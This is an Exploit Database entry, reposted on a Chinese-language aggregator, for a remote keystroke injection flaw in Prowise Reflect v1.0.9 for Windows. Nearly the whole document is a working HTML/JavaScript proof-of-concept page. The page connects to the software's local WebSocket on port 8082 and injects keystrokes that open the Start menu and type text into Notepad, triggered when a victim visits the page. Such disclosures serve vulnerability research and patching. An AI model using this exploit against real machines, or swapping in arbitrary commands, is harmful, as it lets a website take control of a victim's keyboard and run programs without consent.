Prowise Reflect v1.0.9 – Remote Keystroke Injection

• Exploit Database
• 13 阅读

• 作者： Rik Lutz
  日期： 2022-03-02
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50796/

• # Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
  # Date: 30/10/2022
  # Exploit Author: Rik Lutz
  # Vendor Homepage: https://www.prowise.com/
  # Version: V1.0.9
  # Tested on: Windows 10
  
  # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. 
  # Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
  # or by visiting a malicious website. This POC contains the malicious webpage.
  # Steps:
  # 1. Start Prowise reflect
  # 2. Try to connect to a reflect server e.q. ygm7u6od
  # 3. When it is connecting click exploit
  # - Start menu will open, types notepad.exe and types hello world.
  
  <!DOCTYPE HTML>
  
  <html>
   <head>
  
  <script type = "text/javascript">
  
  function wait(ms){
  	var start = new Date().getTime();
  	var end = start;
  	while(end < start + ms) {
  		end = new Date().getTime();
  	}
  }
  
  function WebSocketTest() {
  	var StateConnecting = new Boolean(false);
  	if ("WebSocket" in window) { 
  		// Let us open a web socket
  		var ws = new WebSocket("ws://localhost:8082");
  
  		ws.onopen = function() {
  
  			ws.send('{"event":"keyboard", "key":"super"}');		
  			wait(400);
  			//character is slower
  			// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
  			
  			// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
  			var exploitcode = "notepad.exe"
  			for (let i = 0; i < exploitcode.length; i++) {
  				ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
  			} 
  			
  			wait(300);
  			ws.send('{"event":"keyboard", "key":"enter"}');
  			wait(2000);
  			exploitcode = "Hello world!"
  			
  			for (let i = 0; i < exploitcode.length; i++) {
  				ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
  			} 
  			wait(200);
  		};
  
  		ws.onmessage = function (evt) { 
  			var received_msg = evt.data;
  		};
  
  		ws.onclose = function() { 
  
  			// websocket is closed.
  			alert("Connection is closed..."); 
  		};
  	} else {
  		// The browser doesn't support WebSocket
  		alert("WebSocket NOT supported by your Browser!");
  	}
  }
  </script>
  		
   </head>
   
   <body>
  <div id = "sse">
   <a href = "javascript:WebSocketTest()">Exploit!</a>
  </div>
  
   </body>
  </html>